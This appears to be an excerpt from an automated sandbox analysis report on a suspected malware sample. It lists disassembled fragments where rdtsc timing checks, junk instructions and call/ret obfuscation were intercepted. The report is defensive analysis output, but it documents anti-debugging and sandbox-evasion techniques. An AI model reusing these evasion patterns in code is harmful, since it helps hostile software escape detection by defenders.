Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB59D2 second address: EB5A53 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FB16D386888h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov di, si 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FB16D386888h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov eax, dword ptr [ebp+122D03F1h] 0x00000056 mov dword ptr [ebp+1246B500h], esi 0x0000005c push FFFFFFFFh 0x0000005e or bh, FFFFFF80h 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 jo 00007FB16D38688Ch 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB1728 second address: EB1732 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB16CB2DB7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB5A53 second address: EB5A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB5A57 second address: EB5A73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16CB2DB7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jg 00007FB16CB2DB80h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB7796 second address: EB779A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB779A second address: EB77CD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB16CB2DB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b js 00007FB16CB2DB7Bh 0x00000011 mov ebx, 00739D35h 0x00000016 push 00000000h 0x00000018 jno 00007FB16CB2DB78h 0x0000001e mov ebx, dword ptr [ebp+124557A8h] 0x00000024 push 00000000h 0x00000026 sub edi, dword ptr [ebp+124853D3h] 0x0000002c xchg eax, esi 0x0000002d push edi 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB6AE3 second address: EB6AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB8808 second address: EB880C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB880C second address: EB8826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jl 00007FB16D386886h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB8826 second address: EB882B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB882B second address: EB88A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16D38688Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FB16D386888h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov di, cx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007FB16D386888h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 mov bh, DFh 0x00000048 jmp 00007FB16D38688Ah 0x0000004d push 00000000h 0x0000004f and edi, 504FEC5Fh 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b pop edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB8A0F second address: EB8ABE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB16CB2DB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB16CB2DB86h 0x0000000f popad 0x00000010 nop 0x00000011 mov dword ptr [ebp+12465260h], ebx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e and edi, dword ptr [ebp+122D1A40h] 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007FB16CB2DB78h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 jmp 00007FB16CB2DB7Fh 0x0000004a mov edi, dword ptr [ebp+122D1B20h] 0x00000050 mov eax, dword ptr [ebp+122D119Dh] 0x00000056 xor edi, dword ptr [ebp+122D19ACh] 0x0000005c add ebx, dword ptr [ebp+122D3711h] 0x00000062 push FFFFFFFFh 0x00000064 push 00000000h 0x00000066 push ebp 0x00000067 call 00007FB16CB2DB78h 0x0000006c pop ebp 0x0000006d mov dword ptr [esp+04h], ebp 0x00000071 add dword ptr [esp+04h], 00000015h 0x00000079 inc ebp 0x0000007a push ebp 0x0000007b ret 0x0000007c pop ebp 0x0000007d ret 0x0000007e clc 0x0000007f nop 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB8ABE second address: EB8AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB8AC2 second address: EB8AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB8AC6 second address: EB8ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB8ACC second address: EB8AE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16CB2DB81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EBA7B1 second address: EBA7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB8AE6 second address: EB8AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EBA7B5 second address: EBA7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EBB914 second address: EBB91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EBC982 second address: EBC987 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EBC987 second address: EBC9A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16CB2DB7Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EBDAAE second address: EBDAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EBDAB2 second address: EBDAB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EBDAB6 second address: EBDB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007FB16D38688Ah 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FB16D386888h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f je 00007FB16D38688Dh 0x00000035 push eax 0x00000036 add di, 6178h 0x0000003b pop ebx 0x0000003c push 00000000h 0x0000003e mov ebx, dword ptr [ebp+122D37E5h] 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jo 00007FB16D386886h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EBDB09 second address: EBDB0F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB9B25 second address: EB9B29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EBFC82 second address: EBFC88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EBECEF second address: EBECF9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB16D386886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EBECF9 second address: EBEDB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16CB2DB89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, 233E9E0Ah 0x00000011 xor bx, 8E24h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d xor edi, 36272272h 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007FB16CB2DB78h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 mov dword ptr [ebp+1245BD26h], ecx 0x0000004a mov eax, dword ptr [ebp+122D035Dh] 0x00000050 call 00007FB16CB2DB7Bh 0x00000055 or dword ptr [ebp+12484226h], esi 0x0000005b pop ebx 0x0000005c push FFFFFFFFh 0x0000005e push 00000000h 0x00000060 push esi 0x00000061 call 00007FB16CB2DB78h 0x00000066 pop esi 0x00000067 mov dword ptr [esp+04h], esi 0x0000006b add dword ptr [esp+04h], 00000016h 0x00000073 inc esi 0x00000074 push esi 0x00000075 ret 0x00000076 pop esi 0x00000077 ret 0x00000078 jmp 00007FB16CB2DB80h 0x0000007d nop 0x0000007e push eax 0x0000007f push edx 0x00000080 pushad 0x00000081 pushad 0x00000082 popad 0x00000083 push edi 0x00000084 pop edi 0x00000085 popad 0x00000086 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EBFEFF second address: EBFF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EC8C54 second address: EC8C6C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007FB16CB2DB76h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 jg 00007FB16CB2DB76h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EC8C6C second address: EC8C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EC8C76 second address: EC8C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EC8DA6 second address: EC8DC6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB16D38688Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB16D38688Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EC8DC6 second address: EC8DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EC90B9 second address: EC90BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EC90BD second address: EC90C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ECAB49 second address: ECAB64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D38688Dh 0x00000007 jp 00007FB16D386886h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ECAB64 second address: ECAB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ECFCE7 second address: ECFCF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB16D386886h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ECFCF1 second address: ECFD01 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB16CB2DB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ECFD01 second address: ECFD05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ECFD05 second address: ECFD20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16CB2DB84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ECFD20 second address: ECFD4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16D38688Fh 0x00000009 jl 00007FB16D386886h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB16D38688Dh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED07EE second address: ED07F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED07F4 second address: ED0844 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D386892h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007FB16D38689Fh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007FB16D38688Fh 0x00000019 mov eax, dword ptr [eax] 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED0844 second address: ED0848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED0848 second address: ED084C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED09D2 second address: ED0A05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16CB2DB81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB16CB2DB7Eh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED0A05 second address: ED0A24 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007FB16D386886h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB16D38688Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED0A24 second address: ED0A2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FB16CB2DB76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED4D54 second address: ED4D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED5489 second address: ED5493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB16CB2DB76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED5493 second address: ED54B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 jmp 00007FB16D38688Fh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED54B6 second address: ED54BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED562B second address: ED5630 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED5630 second address: ED563F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FB16CB2DB76h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED563F second address: ED568A instructions: 0x00000000 rdtsc 0x00000002 js 00007FB16D386886h 0x00000008 jmp 00007FB16D386896h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007FB16D386896h 0x00000018 jp 00007FB16D386886h 0x0000001e push edi 0x0000001f pop edi 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jnc 00007FB16D386886h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED568A second address: ED5693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED57E2 second address: ED57E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED57E8 second address: ED57EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED57EC second address: ED57FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FB16D386886h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED5C16 second address: ED5C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16CB2DB85h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: ED5C2F second address: ED5C65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FB16D38688Fh 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FB16D38688Eh 0x00000016 jno 00007FB16D38688Eh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E605DE second address: E605E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E605E4 second address: E605EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E605EA second address: E605EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EAE55E second address: EAE5A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D38688Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 50E160E7h 0x00000010 call 00007FB16D386896h 0x00000015 xor dword ptr [ebp+1245B8B1h], edi 0x0000001b pop ecx 0x0000001c call 00007FB16D386889h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jc 00007FB16D386886h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EAE5A4 second address: EAE5AE instructions: 0x00000000 rdtsc 0x00000002 js 00007FB16CB2DB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EAE5AE second address: EAE5C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D38688Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FB16D386886h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EAE79D second address: EAE7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EAE7A1 second address: EAE7D3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB16D386886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB16D386896h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB16D38688Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EAEAEE second address: EAEAF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EAEFA3 second address: EAEFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007FB16D38688Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E8D7A4 second address: E8D7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
